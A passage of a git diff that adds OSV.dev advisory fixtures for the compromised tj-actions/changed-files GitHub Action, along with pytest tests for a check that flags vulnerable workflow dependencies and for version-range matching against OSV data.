"https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20250315060250/https://github.com/tj-actions/changed-files/issues/2463" + }, + { + "type": "WEB", + "url": "https://sysdig.com/blog/detecting-and-mitigating-the-tj-actions-changed-files-supply-chain-attack-cve-2025-30066" + }, + { + "type": "WEB", + "url": "https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised" + }, + { + "type": "WEB", + "url": "https://news.ycombinator.com/item?id=43367987" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/releases/tag/v46.0.1" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/blob/45fb12d7a8bedb4da42342e52fe054c6c2c3fd73/README.md?plain=1#L20-L28" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tj-actions/changed-files" + }, + { + "type": "WEB", + "url": "https://github.com/github/docs/blob/962a1c8dccb8c0f66548b324e5b921b5e4fbc3d6/content/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions.md?plain=1#L191-L193" + }, + { + "type": "WEB", + "url": "https://blog.gitguardian.com/compromised-tj-actions" + } + ], + "affected": [ + { + "package": { + "name": "tj-actions/changed-files", + "ecosystem": "GitHub Actions" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "46.0.1" + } + ] + } + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-mrrh-fwg8-r2c3/GHSA-mrrh-fwg8-r2c3.json", + "last_known_affected_version_range": "<= 45.0.7" + } + } + ], + "schema_version": "1.6.0", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ] + } + ] +} diff --git 
a/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_querybatch.json b/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_querybatch.json new file mode 100644 index 000000000..76cdbf292 --- /dev/null +++ b/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_querybatch.json @@ -0,0 +1,19 @@ +{ + "results": [ + {}, + {}, + { + "vulns": [ + { + "id": "GHSA-mcph-m25j-8j63", + "modified": "2024-01-02T16:41:27Z" + }, + { + "id": "GHSA-mrrh-fwg8-r2c3", + "modified": "2025-03-24T14:23:37Z" + } + ] + }, + {} + ] +} diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index c6ecb044d..39bf067ca 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -72,9 +72,11 @@ def test_detect_malicious_metadata( [deps_dev] url_netloc = {base_url_parsed.netloc} url_scheme = {base_url_parsed.scheme} - """ - check.osv_query_url = f"{base_url_parsed.scheme}://{base_url_parsed.netloc}" + [osv_dev] + url_netloc = {base_url_parsed.netloc} + url_scheme = {base_url_parsed.scheme} + """ user_config_path = os.path.join(tmp_path, "config.ini") with open(user_config_path, "w", encoding="utf-8") as user_config_file: user_config_file.write(user_config_input) diff --git a/tests/slsa_analyzer/checks/test_github_actions_vulnerability_check.py b/tests/slsa_analyzer/checks/test_github_actions_vulnerability_check.py new file mode 100644 index 000000000..2336ee89c --- /dev/null +++ b/tests/slsa_analyzer/checks/test_github_actions_vulnerability_check.py @@ -0,0 +1,105 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
+ +"""This module contains tests for the GitHub Actions vulnerabilities check.""" + +import json +import os +import urllib +from pathlib import Path + +import pytest +from pytest_httpserver import HTTPServer + +from macaron.code_analyzer.call_graph import BaseNode, CallGraph +from macaron.config.defaults import load_defaults +from macaron.slsa_analyzer.checks.check_result import CheckResultType +from macaron.slsa_analyzer.checks.github_actions_vulnerability_check import GitHubActionsVulnsCheck +from macaron.slsa_analyzer.ci_service.base_ci_service import BaseCIService +from macaron.slsa_analyzer.ci_service.github_actions.analyzer import build_call_graph_from_path +from macaron.slsa_analyzer.provenance.intoto import InTotoV01Payload +from macaron.slsa_analyzer.specs.ci_spec import CIInfo +from macaron.slsa_analyzer.specs.inferred_provenance import InferredProvenance +from tests.conftest import MockAnalyzeContext + +RESOURCE_PATH = Path(__file__).parent.joinpath("resources") + + +def get_ci_info(ci_services: dict[str, BaseCIService], ci_name: str, workflow_path: str) -> CIInfo: + """Get CIInfo instance.""" + ci_info = CIInfo( + service=ci_services[ci_name], + callgraph=CallGraph(BaseNode(), ""), + provenance_assets=[], + release={}, + provenances=[], + build_info_results=InTotoV01Payload(statement=InferredProvenance().payload), + ) + match ci_name: + case "github_actions": + root_node: BaseNode = BaseNode() + workflow_node = build_call_graph_from_path(root_node, workflow_path=workflow_path, repo_path="") + root_node.add_callee(workflow_node) + ci_info["callgraph"] = CallGraph(root_node, "") + + return ci_info + + +@pytest.mark.parametrize( + ("ci_name", "expected"), + [ + ( + "github_actions", + CheckResultType.FAILED, + ), + ( + "jenkins", + CheckResultType.PASSED, + ), + ], +) +def test_github_actions_vulns( + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + ci_name: str, + ci_services: dict[str, BaseCIService], + expected: str, +) -> None: + 
"""Test that the check handles repositories correctly.""" + check = GitHubActionsVulnsCheck() + + # Set up the context object. + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="") + # Set up responses of OSV API. + with open( + os.path.join(RESOURCE_PATH, "osv_files", "tj-actions_changed-files_query.json"), encoding="utf8" + ) as query: + query_json = json.load(query) + with open( + os.path.join(RESOURCE_PATH, "osv_files", "tj-actions_changed-files_querybatch.json"), encoding="utf8" + ) as querybatch: + query_batch_json = json.load(querybatch) + + gha_source_path = os.path.join(RESOURCE_PATH, "github", "workflow_files", "Bradford1040_mainsail_check_locale.yml") + + base_url_parsed = urllib.parse.urlparse(httpserver.url_for("")) + user_config_input = f""" + [osv_dev] + url_netloc = {base_url_parsed.netloc} + url_scheme = {base_url_parsed.scheme} + """ + user_config_path = os.path.join(tmp_path, "config.ini") + with open(user_config_path, "w", encoding="utf-8") as user_config_file: + user_config_file.write(user_config_input) + # We don't have to worry about modifying the ``defaults`` object causing test + # pollution here, since we reload the ``defaults`` object before every test with the + # ``setup_test`` fixture. + load_defaults(user_config_path) + + httpserver.expect_request("/v1/query").respond_with_json(query_json) + httpserver.expect_request("/v1/querybatch").respond_with_json(query_batch_json) + + ctx.dynamic_data["ci_services"] = [get_ci_info(ci_services, ci_name, gha_source_path)] + + assert check.run_check(ctx).result_type == expected diff --git a/tests/slsa_analyzer/package_registry/test_osv_dev.py b/tests/slsa_analyzer/package_registry/test_osv_dev.py new file mode 100644 index 000000000..ea7a86ced --- /dev/null +++ b/tests/slsa_analyzer/package_registry/test_osv_dev.py @@ -0,0 +1,220 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. 
+# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests for the osv.dev service.""" + +import os +from pathlib import Path + +import pytest + +from macaron.config.defaults import load_defaults +from macaron.errors import APIAccessError +from macaron.slsa_analyzer.package_registry.osv_dev import OSVDevService + + +@pytest.mark.parametrize( + ("user_config_input"), + [ + pytest.param( + """ + [osv_dev] + url_netloc = + url_scheme = https + query_endpoint = v1/query + """, + id="Missing netloc", + ), + pytest.param( + """ + [osv_dev] + url_netloc = osv.dev + url_scheme = https + query_endpoint = + """, + id="Missing query endpoint", + ), + ], +) +def test_load_defaults_query_api(tmp_path: Path, user_config_input: str) -> None: + """Test the ``load_defaults`` method.""" + user_config_path = os.path.join(tmp_path, "config.ini") + + with open(user_config_path, "w", encoding="utf-8") as user_config_file: + user_config_file.write(user_config_input) + + # We don't have to worry about modifying the ``defaults`` object causing test + # pollution here, since we reload the ``defaults`` object before every test with the + # ``setup_test`` fixture. 
+ load_defaults(user_config_path) + + with pytest.raises(APIAccessError): + OSVDevService.call_osv_query_api({}) + + +def test_is_affected_version_invalid_commit() -> None: + """Test if the function can handle invalid commits""" + with pytest.raises(APIAccessError): + OSVDevService.is_version_affected( + vuln={}, pkg_name="pkg", pkg_version="invalid_commit", ecosystem="GitHub Actions" + ) + + +def test_is_affected_version_invalid_response() -> None: + """Test if the function can handle empty OSV response.""" + with pytest.raises(APIAccessError): + OSVDevService.is_version_affected( + vuln={"vulns": []}, pkg_name="repo/workflow", pkg_version="1.0.0", ecosystem="GitHub Actions" + ) + + +@pytest.mark.parametrize( + ("vuln", "workflow"), + [ + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + } + ], + }, + "tj-actions/changed-files", + id="Test missing ranges", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [ + { + "type": "ECOSYSTEM", + } + ], + } + ], + }, + "tj-actions/changed-files", + id="Test missing events", + ), + ], +) +def test_is_affected_version_invalid_osv_vulns(vuln: dict, workflow: str) -> None: + """Test if the function can handle invalid OSV vulnerability data.""" + with pytest.raises(APIAccessError): + OSVDevService.is_version_affected( + vuln=vuln, pkg_name=workflow, pkg_version="45.0.0", ecosystem="GitHub Actions" + ) + + +@pytest.mark.parametrize( + ("vuln", "workflow", "version", "expected"), + [ + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "45.0.0", + True, + id="Test affected 
version", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "45.0.0", + True, + id="Test affected version missing introduced", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + {"introduced": "0"}, + ], + } + ], + } + ], + }, + "tj-actions/changed-files", + "45.0.0", + True, + id="Test affected version missing fix", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "47.0.0", + False, + id="Test unaffected version", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "1.0.0"}, {"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "1.0.0", + True, + id="Test introduced version", + ), + pytest.param( + { + "id": "GHSA-mrrh-fwg8-r2c3", + "affected": [ + { + "package": {"name": "tj-actions/changed-files", "ecosystem": "GitHub Actions"}, + "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "46.0.1"}]}], + } + ], + }, + "tj-actions/changed-files", + "46.0.1", + False, + id="Test fix version", + ), + ], +) +def test_is_affected_version_ranges(vuln: dict, workflow: str, version: str, expected: bool) -> None: + """Test if the function can handle corner cases.""" + assert ( + OSVDevService.is_version_affected(vuln=vuln, pkg_name=workflow, 
pkg_version=version, ecosystem="GitHub Actions") + == expected + )